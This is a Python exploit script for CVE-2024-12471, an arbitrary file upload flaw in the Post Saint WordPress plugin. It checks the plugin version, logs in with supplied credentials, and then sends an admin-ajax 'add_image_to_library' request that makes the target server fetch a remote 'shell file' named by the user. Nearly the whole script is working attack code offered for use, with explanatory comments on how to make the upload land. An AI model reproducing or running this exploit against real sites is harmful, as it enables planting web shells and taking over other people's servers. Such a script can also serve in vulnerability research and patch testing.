import requests
import argparse
import re
from urllib3.exceptions import InsecureRequestWarning
from packaging.version import parse as parse_version
#by Nxploit | Khaled_alenazi
def banner():
    """Print the tool's ASCII-art banner to stdout (purely cosmetic, no return value)."""
    print("""
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@ @@@ @@@@@@ @@@ @@@@@@@@ @@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@ @@@@ @@@@@@@@ @@@@ @@@@@@@@ @@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ @@!@! @@@!! @@@ @@!@! @@! @@@!!
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@!!@! !@! @!@ !@!!@! !@! !@!
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ @!! @!! @!@!@!@!@ @!@ !!@ @!! @!! @!! @!@
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: !!! !@! !!!@!@!!! !@! !!: !!! !@! !!! !@!
:!! :!: !!: !!: !:! !!:! !!! !:! :!!:!:!!: !!: !:! :!!:!:!!: !!: !!:
:!: ::!!:! :!: :!: :!: !:! :!: !:::!!::: :!: :!: !:::!!::: :!: :!:
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: ::: ::: :: ::::: ::: :: :::
:: :: : : : :: :: :: : ::: : : : : :: : ::: ::: :: :: : ::: ::: : : ::
""")
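def parse_version_info(version_text):
    """Extract the plugin version from a WordPress readme's ``Stable tag:`` line.

    Args:
        version_text: Body of the plugin's README.txt (any text is accepted).

    Returns:
        The version as a dotted numeric string such as ``"1.3.1"``, or None when
        no numeric stable tag is present (e.g. ``Stable tag: trunk`` or no tag).
    """
    # Each component is anchored to a digit so a stray trailing dot or a bare
    # "." cannot be captured; the old `[\d.]+` pattern could hand strings like
    # "1.3.1." to packaging's parser, which rejects them with InvalidVersion.
    match = re.search(r"Stable tag:\s*(\d+(?:\.\d+)*)", version_text)
    return match.group(1) if match else None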
def is_version_vulnerable(version, vulnerable_version="1.3.1"):
    """Return True when ``version`` is at or below the last affected release.

    Args:
        version: Detected plugin version string, e.g. ``"1.2.0"``.
        vulnerable_version: Highest version still affected; ``"1.3.1"`` by default.

    Returns:
        bool: ``version <= vulnerable_version`` under PEP 440 ordering.

    Raises:
        packaging.version.InvalidVersion: if either string is not a valid version.
    """
    detected = parse_version(version)
    last_affected = parse_version(vulnerable_version)
    # PEP 440 comparison: "1.10" sorts above "1.9", unlike a plain string compare.
    return not detected > last_affected
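def check_version(base_url):
    """Fetch the plugin's README.txt and report whether its Stable tag is in the affected range.

    Args:
        base_url: Base URL of the WordPress site; a trailing slash is tolerated.

    Returns:
        The detected version string, or None when it could not be fetched or
        parsed. The outcome is printed as well, so callers that ignore the
        return value keep working.
    """
    # NOTE(review): the path is case-sensitive on most hosts and many plugins
    # ship a lowercase readme.txt — confirm against the plugin package before
    # treating "not found" as "plugin absent".
    version_url = f"{base_url.rstrip('/')}/wp-content/plugins/post-saint/README.txt"
    # verify=False is deliberate (self-signed lab targets); the timeout keeps a
    # dead host from hanging the whole run.
    try:
        response = requests.get(version_url, verify=False, timeout=10)
    except requests.RequestException as e:
        print(f"Error checking version: {e}")
        return None
    if response.status_code != 200:
        print(f"Failed to fetch version info. HTTP Status: {response.status_code}")
        return None
    version = parse_version_info(response.text)
    if not version:
        print("Version information not found in README.txt.")
        return None
    try:
        vulnerable = is_version_vulnerable(version)
    except ValueError as e:
        # packaging's InvalidVersion derives from ValueError; catching only that
        # (rather than every Exception) keeps real bugs visible.
        print(f"Error checking version: {e}")
        return None
    if vulnerable:
        print(f"Vulnerable version detected: {version}")
    else:
        print(f"Secure version detected: {version}")
    return version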
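def login_wordpress(session, base_url, username, password):
    """Authenticate against wp-login.php, leaving the auth cookies on ``session``.

    The exploit path is authenticated: the supplied account must already exist
    on the target. Nothing here creates or escalates an account.

    Args:
        session: ``requests.Session`` (or compatible object exposing ``post``
            and ``cookies``) that will carry the login cookies afterwards.
        base_url: Base URL of the WordPress site; a trailing slash is tolerated.
        username: WordPress account name.
        password: Password for that account.

    Returns:
        True when a ``wordpress_logged_in*`` cookie is present on the session
        after the request, False otherwise. The outcome is printed as well.
    """
    login_url = base_url.rstrip('/') + '/wp-login.php'
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    # verify=False is deliberate (self-signed lab targets). The timeout is new:
    # the original call had none and could block forever on an unresponsive host.
    try:
        session.post(
            login_url,
            verify=False,
            timeout=10,
            data={
                'log': username,
                'pwd': password,
                'rememberme': 'forever',
                'wp-submit': 'Log In'
            },
            headers={"User-Agent": user_agent}
        )
    except requests.RequestException as e:
        print(f"[-] Failed to log in: {e}")
        return False
    # WordPress sets wordpress_logged_in_<hash> on success; a failed login
    # redirects back to the form without it, so the cookie is the success signal.
    logged_in = any('wordpress_logged_in' in cookie.name for cookie in session.cookies)
    if logged_in:
        print("[+] Logged in successfully.")
    else:
        print("[-] Failed to log in.")
    return logged_in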
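if __name__ == "__main__":
    banner()
    parser = argparse.ArgumentParser(description="CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload")
    parser.add_argument("-u", "--url", required=True, help="Base URL of the WordPress site")
    parser.add_argument("-un", "--username", required=True, help="WordPress username")
    parser.add_argument("-p", "--password", required=True, help="WordPress password")
    parser.add_argument("-ru", "--remote_url", required=True, help="Remote URL of the shell file to inject")
    args = parser.parse_args()

    # Every request below uses verify=False on purpose (lab targets); silence
    # the per-request InsecureRequestWarning instead of leaving the import unused.
    import urllib3
    urllib3.disable_warnings(InsecureRequestWarning)

    # Normalise once so "https://host/" and "https://host" build the same paths.
    base_url = args.url.rstrip('/')
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"

    print("[+] Checking plugin version...")
    check_version(base_url)

    session = requests.Session()
    if not login_wordpress(session, base_url, args.username, args.password):
        # Non-zero exit so a wrapper can tell a failed login from a sent request;
        # the bare exit() it replaces returned 0.
        raise SystemExit(1)

    # The plugin's add_image_to_library AJAX action receives image_url and
    # presumably fetches it server-side into the media library, which is what
    # makes a hostile remote file land on the target. That means remote_url must
    # be reachable from the *target*, not just from this machine.
    exploit_url = base_url + '/wp-admin/admin-ajax.php'
    payload = {
        'action': 'add_image_to_library',
        'image_url': args.remote_url,
        'image_prompt': 'Nxploit',
        'insert_prompt_media_library_fields': 'caption_description',
        'image_generator': 'pexels',
        'log_id': '1667'
    }
    # Longer timeout than the probes above: the server has to fetch remote_url
    # before it can answer.
    try:
        response = session.post(exploit_url, data=payload, headers={"User-Agent": user_agent}, verify=False, timeout=30)
    except requests.RequestException as e:
        print(f"[-] Exploit failed: {e}")
        raise SystemExit(1)

    # admin-ajax.php answers HTTP 200 with a body of "0" when no handler is
    # hooked for the action (plugin missing/inactive) and "-1" on a failed
    # nonce/capability check, so a 200 alone does not mean the upload happened.
    body = response.text.strip()
    if response.status_code == 200 and body not in ("0", "-1"):
        print("[+] Exploit sent successfully.")
        print("Response:", response.text)
    else:
        print("[-] Exploit failed.")
        print("Status Code:", response.status_code)
        print("Response:", response.text)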